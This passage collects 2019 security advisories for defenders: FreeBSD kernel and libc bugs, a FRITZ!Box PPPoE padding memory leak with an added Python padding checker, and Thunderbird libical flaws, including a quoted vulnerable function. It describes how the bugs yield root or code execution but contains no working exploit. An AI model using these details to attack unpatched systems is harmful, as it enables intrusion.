server, or by an active attacker in the network path between the client and
server. Specially crafted TELNET command sequences may cause the execution
of arbitrary code with the privileges of the user invoking telnet(1).

IV.  Workaround

Do not use telnet(1) to connect to untrusted machines or over an untrusted
network.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch
# fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch.asc
# gpg --verify telnet.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r350139
releng/12.0/                                                      r350281
stable/11/                                                        r350140
releng/11.2/                                                      r350281
releng/11.3/                                                      r350281
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0053

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:12.telnet.asc
FreeBSD Security Advisory FreeBSD-SA-19:13.pts
FreeBSD-SA-19:13.pts                                        Security Advisory
                                                          The FreeBSD Project

Topic:          pts(4) write-after-free

Category:       core
Module:         kernel
Announced:      2019-07-24
Credits:        syzkaller
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-07 14:19:46 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:53:06 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-07 14:20:14 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:53:06 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:53:06 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5606

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

The posix_openpt(2) system call allocates a pseudo-terminal device and
returns a descriptor referencing that device. Such a descriptor may be
configured such that a SIGIO signal will be sent to a designated process or
process group when the device is ready to perform I/O.

II.  Problem Description

The code which handles a close(2) of a descriptor created by posix_openpt(2)
fails to undo the configuration which causes SIGIO to be raised. This bug
can lead to a write-after-free of kernel memory.

III. Impact

The bug permits malicious code to trigger a write-after-free, which may be
used to gain root privileges or escape a jail.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch
# fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch.asc
# gpg --verify pts.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r349805
releng/12.0/                                                      r350282
stable/11/                                                        r349806
releng/11.2/                                                      r350282
releng/11.3/                                                      r350282
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5606

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:13.pts.asc
Deutsche Telekom CERT Advisory [DTC-A-20170323-001]
Summary: Information leakage found in FRITZ!OS 6.83 & 6.80 (AVM DSL Router Fritz!Box 7490)

Recommendation: Update to the newest version of FRITZ!OS

Details:
a) application
b) problem
c) CVSS
d) detailed description
e) credits

a) FRITZ!OS 6.83 & 6.80 (AVM DSL Router Fritz!Box 7490)

b) Memory leakage within the PPPoE/PPP padding

c) 4.7 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N/RL:U

d) Multiple DSL access routers (aka Homegateway / CPE) handle PPPoE frame padding incorrectly. Instead of padding frames with zeroes, frames are padded with random memory, allowing an attacker (with physical access to the wire between the PPPoE endpoints) to view slices of previously transmitted packets or portions of kernel memory. This seems to be similar to http://www.securiteam.com/securitynews/5BP01208UO.html.

The AVM DSL Router Fritz!Box 7490 (tested with FRITZ!OS 6.83 & 6.80) sends a portion of memory within PPPoE Discovery protocol PADT frames because arbitrary memory is used as the padding that brings the frame up to the minimum Ethernet frame length. Further research shows that short PPP LCP frames are also padded with random memory.

e) Christian Kagerhuber
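A defender-side check for the padding behaviour described above, added here as an example (it is not code from the advisory or from AVM): it parses PPPoE Discovery frames, locates the bytes beyond the declared PPPoE payload length, and flags any frame whose padding is not all zeros, which is what a correct sender emits. The frames, MAC addresses and the leaked text are constructed for illustration; in practice the same check is run over frames captured on the PPPoE segment.

```python
"""Check PPPoE Discovery frames for non-zero Ethernet padding.

Added example for the padding leak described in DTC-A-20170323-001; it is not
code from the advisory or from AVM. Frame layout follows RFC 2516 (PPPoE) on
Ethernet; the 60-byte minimum frame length excludes the FCS. All frames, MAC
addresses and "leaked" bytes below are constructed for illustration.
"""
import struct
from typing import List, Optional

ETH_HDR_LEN = 14
ETHERTYPE_PPPOE_DISCOVERY = 0x8863
PPPOE_HDR_LEN = 6            # ver/type (1), code (1), session id (2), length (2)
PPPOE_VER_TYPE = 0x11        # version 1, type 1
PADT = 0xA7                  # PPPoE Active Discovery Terminate
MIN_ETH_FRAME = 60           # minimum Ethernet frame length without FCS


def pppoe_padding(frame: bytes) -> Optional[bytes]:
    """Return the bytes that follow the declared PPPoE payload, i.e. the
    Ethernet padding, or None if the frame is not a well-formed PPPoE
    Discovery frame."""
    if len(frame) < ETH_HDR_LEN + PPPOE_HDR_LEN:
        return None
    (ethertype,) = struct.unpack("!H", frame[12:14])
    if ethertype != ETHERTYPE_PPPOE_DISCOVERY:
        return None
    ver_type, _code, _session, length = struct.unpack(
        "!BBHH", frame[ETH_HDR_LEN:ETH_HDR_LEN + PPPOE_HDR_LEN])
    if ver_type != PPPOE_VER_TYPE:
        return None
    end = ETH_HDR_LEN + PPPOE_HDR_LEN + length
    if end > len(frame):
        return None            # declared payload runs past the frame: malformed
    return frame[end:]


def leaks_padding(frame: bytes) -> bool:
    """True when a PPPoE Discovery frame carries padding that is not all zeros.
    A correctly behaving sender pads short frames with zero bytes only."""
    pad = pppoe_padding(frame)
    return bool(pad) and any(pad)


def scan(frames: List[bytes]) -> List[int]:
    """Indices of the frames whose padding contains non-zero bytes."""
    return [i for i, f in enumerate(frames) if leaks_padding(f)]


def build_padt(session_id: int, payload: bytes = b"",
               padding: Optional[bytes] = None) -> bytes:
    """Construct a PADT frame. With padding=None the frame is padded with
    zeros, as a correct implementation would; otherwise the given bytes fill
    the padding area, which is how the leak in the advisory shows up."""
    eth = struct.pack("!6s6sH", b"\x00\x11\x22\x33\x44\x55",
                      b"\x66\x77\x88\x99\xaa\xbb", ETHERTYPE_PPPOE_DISCOVERY)
    pppoe = struct.pack("!BBHH", PPPOE_VER_TYPE, PADT, session_id, len(payload))
    frame = eth + pppoe + payload
    need = max(0, MIN_ETH_FRAME - len(frame))
    if padding is None:
        padding = b""
    return frame + padding.ljust(need, b"\x00")[:need]


# Constructed samples: a clean PADT, a PADT whose padding holds fragments of an
# earlier packet, a PADT carrying a Generic-Error tag, and an IPv4 frame.
LEAKED = b"GET /index.html HTTP/1.1\r\nHost: example"     # constructed
GENERIC_ERROR_TAG = struct.pack("!HH", 0x0203, 3) + b"bye"
CLEAN_PADT = build_padt(0x0001)
LEAKY_PADT = build_padt(0x0001, padding=LEAKED)
TAGGED_PADT = build_padt(0x0002, payload=GENERIC_ERROR_TAG)
IPV4_FRAME = (b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb"
              + b"\x08\x00").ljust(MIN_ETH_FRAME, b"\x00")
SAMPLE_FRAMES = [CLEAN_PADT, LEAKY_PADT, TAGGED_PADT, IPV4_FRAME]

if __name__ == "__main__":
    for i, frame in enumerate(SAMPLE_FRAMES):
        pad = pppoe_padding(frame)
        status = ("not PPPoE discovery" if pad is None
                  else "LEAK" if any(pad) else "clean")
        print(f"frame {i}: len={len(frame)} padding={len(pad or b'')} {status}")
```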
FreeBSD Security Advisory FreeBSD-SA-19:10.ufs
FreeBSD-SA-19:10.ufs                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Kernel stack disclosure in UFS/FFS

Category:       core
Module:         Kernel
Announced:      2019-07-02
Credits:        David G. Lawrence
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-10 23:45:16 UTC (stable/12, 12.0-STABLE)
                2019-07-02 00:02:16 UTC (releng/12.0, 12.0-RELEASE-p7)
                2019-05-10 23:46:42 UTC (stable/11, 11.2-STABLE)
                2019-07-02 00:02:16 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:       CVE-2019-5601

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

The Berkeley Fast File System (FFS) is an implementation of the UNIX File
System (UFS) filesystem used by FreeBSD.

II.  Problem Description

A bug causes up to three bytes of kernel stack memory to be written to disk
as uninitialized directory entry padding. This data can be viewed by any
user with read access to the directory. Additionally, a malicious user with
write access to a directory can cause up to 254 bytes of kernel stack memory
to be exposed.

III. Impact

Some amount of the kernel stack is disclosed and written out to the
filesystem.

IV.  Workaround

No workaround is available but systems not using UFS/FFS are not affected.

V.   Solution

Special note: This update also adds the -z flag to fsck_ffs to have it scrub
the leaked information in the name padding of existing directories. It only
needs to be run once on each UFS/FFS filesystem after a patched kernel is
installed and running.

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system and run:

# fsck -t ufs -f -p -T ufs:-z

to clean up your existing filesystems.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.x]
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch.asc
# gpg --verify ufs.12.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch.asc
# gpg --verify ufs.11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system,
then run:

# fsck -t ufs -f -p -T ufs:-z

to clean up your existing filesystems.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r347474
releng/12.0/                                                      r349623
stable/11/                                                        r347475
releng/11.2/                                                      r349623
-------------------------------------------------------------------------

Note: This patch was applied to the stable/11 branch before the branch point
for releng/11.3. As such, no patch is needed for any 11.3-BETA or -RC.

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5601

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:10.ufs.asc
FreeBSD Security Advisory FreeBSD-SA-19:11.cd_ioctl
FreeBSD-SA-19:11.cd_ioctl                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Privilege escalation in cd(4) driver

Category:       core
Module:         kernel
Announced:      2019-07-02
Credits:        Alex Fortune
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-03 00:11:31 UTC (stable/12, 12.0-STABLE)
                2019-07-02 00:03:55 UTC (releng/12.0, 12.0-RELEASE-p7)
                2019-07-03 00:12:50 UTC (stable/11, 11.3-PRERELEASE)
                2019-07-02 00:03:55 UTC (releng/11.3, 11.3-RC3-p1)
                2019-07-02 00:03:55 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:       CVE-2019-5602

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

The cd(4) driver implements a number of ioctls to permit low-level access to
the media in the CD-ROM device. The Linux emulation layer provides a
corresponding set of ioctls, some of which are implemented as wrappers of
native cd(4) ioctls. These ioctls are available to users in the operator
group, which gets read-only access to cd(4) devices by default.

II.  Problem Description

To implement one particular ioctl, the Linux emulation code used a special
interface present in the cd(4) driver which allows it to copy subchannel
information directly to a kernel address. This interface was erroneously
made accessible to userland, allowing users with read access to a cd(4)
device to arbitrarily overwrite kernel memory when some media is present in
the device.

III. Impact

A user in the operator group can make use of this interface to gain root
privileges on a system with a cd(4) device when some media is present in the
device.

IV.  Workaround

devfs.conf(5) and devfs.rules(5) can be used to remove read permissions from
cd(4) devices.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.x]
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch.asc
# gpg --verify cd_ioctl.12.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch.asc
# gpg --verify cd_ioctl.11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r349628
releng/12.0/                                                      r349625
stable/11/                                                        r349629
releng/11.3/                                                      r349625
releng/11.2/                                                      r349625
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5602

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:11.cd_ioctl.asc
FreeBSD Security Advisory FreeBSD-SA-19:09.iconv
FreeBSD-SA-19:09.iconv                                      Security Advisory
                                                          The FreeBSD Project

Topic:          iconv buffer overflow

Category:       core
Module:         libc
Announced:      2019-07-02
Credits:        Andrea Venturoli, NetFence
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-03 00:01:38 UTC (stable/12, 12.0-STABLE)
                2019-07-03 00:00:39 UTC (releng/12.0, 12.0-RELEASE-p7)
                2019-07-03 00:03:14 UTC (stable/11, 11.3-PRERELEASE)
                2019-07-03 00:00:39 UTC (releng/11.3, 11.3-RC3-p1)
                2019-07-03 00:00:39 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:       CVE-2019-5600

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

The iconv(3) API converts text data from one character encoding to another
and is available as part of the standard C library (libc).

II.  Problem Description

With certain inputs, iconv may write beyond the end of the output buffer.

III. Impact

Depending on the way in which iconv is used, an attacker may be able to
create a denial of service, provoke incorrect program behavior, or induce a
remote code execution. iconv is a libc library function and the nature of
possible attacks will depend on the way in which iconv is used by
applications or daemons.

IV.  Workaround

No workaround is available. Stack canaries (-fstack-protector), which are
enabled by default, provide a degree of defense against code injection but
not against denial of service.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date. Restart
any potentially affected daemons.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch
# fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch.asc
# gpg --verify iconv.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r349622
releng/12.0/                                                      r349621
stable/11/                                                        r349624
releng/11.3/                                                      r349621
releng/11.2/                                                      r349621
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5600

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:09.iconv.asc
FreeBSD Security Advisory FreeBSD-SA-19:08.rack
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:08.rack                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in non-default RACK TCP stack

Category:       core
Module:         inet
Announced:      2019-06-19
Credits:        Jonathan Looney (Netflix)
                Peter Lei (Netflix)
Affects:        FreeBSD 12.0 and later
Corrected:      2019-06-19 16:25:39 UTC (stable/12, 12.0-STABLE)
                2019-06-19 16:43:05 UTC (releng/12.0, 12.0-RELEASE-p6)
CVE Name:       CVE-2019-5599

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data stream
service.

A TCP loss detection algorithm called RACK ("Recent ACKnowledgment") uses
the notion of time, in addition to packet or sequence counts, to detect
losses for modern TCP implementations that support per-packet timestamps
and the selective acknowledgment (SACK) option.

FreeBSD ships an optional implementation of RACK. Please note this is not
included by default. If RACK was not specifically compiled, installed, and
loaded, the system is not vulnerable.

II.  Problem Description

While processing acknowledgements, the RACK code uses several linked lists
to maintain state entries. A malicious attacker can cause the lists to grow
unbounded. This can cause an expensive list traversal on every packet being
processed, leading to resource exhaustion and a denial of service.

III. Impact

An attacker with the ability to send specially crafted TCP traffic to a
victim system can degrade network performance and/or consume excessive CPU
by exploiting the inefficiency of traversing the potentially very large
RACK linked lists with relatively small bandwidth cost.

IV.  Workaround

By default RACK is not compiled or loaded into the TCP stack.

To determine if you are using RACK, check the net.inet.tcp.functions_available
sysctl. If it includes a line with "rack", the RACK stack is loaded.

To disable RACK, unload the kernel module with:

# kldunload tcp_rack

Note: it may be required to use the force flag (-f) with the kldunload.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Since the tcp_rack kernel module is not built by default, recompile,
reinstall, and reload the kernel module.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch
# fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch.asc
# gpg --verify rack.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile, reinstall, and reload the tcp_rack kernel module.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r349197
releng/12.0/                                                      r349199
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5599

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:08.rack.asc
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0KZy1fFIAALgAo aXNzdWVyLWZwckBub3RhdG
X41 D-Sec GmbH Security Advisory X41-2019-004: Type confusion in Thunderbird
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-004

Type confusion in Thunderbird
=============================
Severity Rating: Medium
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11706
CWE: 843
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird

Summary and Impact
==================
A type confusion has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely when an attacker sends a specially crafted calendar attachment, and it does not require user interaction. It might be used by a remote attacker to crash the process or leak information from the client system via calendar replies.

X41 did not perform a full test or audit on the software.

Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and calendaring client that's easy to set up and customize.

Analysis
========
A type confusion in icalproperty.c `icaltimezone_get_vtimezone_properties()` can be triggered while parsing a malformed calendar attachment. Missing sanity checks allow a TZID property to be parsed as `ICAL_FLOAT_VALUE`, but it is later used as a string. The bug manifests when `strdup(tzid)` is called with `tzid` holding a bad pointer obtained by casting a float value to `char *`, which typically means a segfault from dereferencing a non-mapped memory page. An attacker might be able to deliver an input file containing specially crafted float values as TZID properties which could point to arbitrary memory positions. Certain conditions could allow information to be exfiltrated via a calendar reply, or have other undetermined impact.

Proof of Concept
================
A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-004

Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in the Thunderbird configuration.

Timeline
========
2019-05-30 Issues reported to the vendor
2019-06-07 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50
CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI
yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs
e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa
qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF
TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY
8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr
4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4
M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu
gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr
QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm
UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk=
=Hy9J
-----END PGP SIGNATURE-----
X41 D-Sec GmbH Security Advisory X41-2019-003: Stack-based buffer overflow in Thunderbird
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-003

Stack-based buffer overflow in Thunderbird
==========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11705
CWE: 121
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird

Summary and Impact
==================
A stack-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely when an attacker sends a specially crafted calendar attachment, and it does not require user interaction. It might be used by a remote attacker to crash the client or gain remote code execution on the client system.

X41 did not perform a full test or audit on the software.

Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and calendaring client that's easy to set up and customize.

Analysis
========
A stack-based buffer overflow in icalrecur.c `icalrecur_add_bydayrules()` can be triggered while parsing a calendar attachment containing a malformed or specially crafted string.

~~~
static int icalrecur_add_bydayrules(struct icalrecur_parser *parser, const char *vals)
{
    short *array = parser->rt.by_day;
    // ...
    while (n != 0) {
        // ...
        if (wd != ICAL_NO_WEEKDAY) {
            array[i++] = (short) (sign * (wd + 8 * weekno));
            array[i] = ICAL_RECURRENCE_ARRAY_MAX;
        }
    }
~~~

Missing sanity checks in `icalrecur_add_bydayrules()` can lead to an out-of-bounds write in `array` when `weekno` takes an invalid value. The issue manifests as an out-of-bounds write to a stack-allocated buffer. It is expected that an attacker can exploit this vulnerability to achieve remote code execution when proper stack smashing mitigations are missing.

Proof of Concept
================
A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-003

Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in the Thunderbird configuration.

Timeline
========
2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.
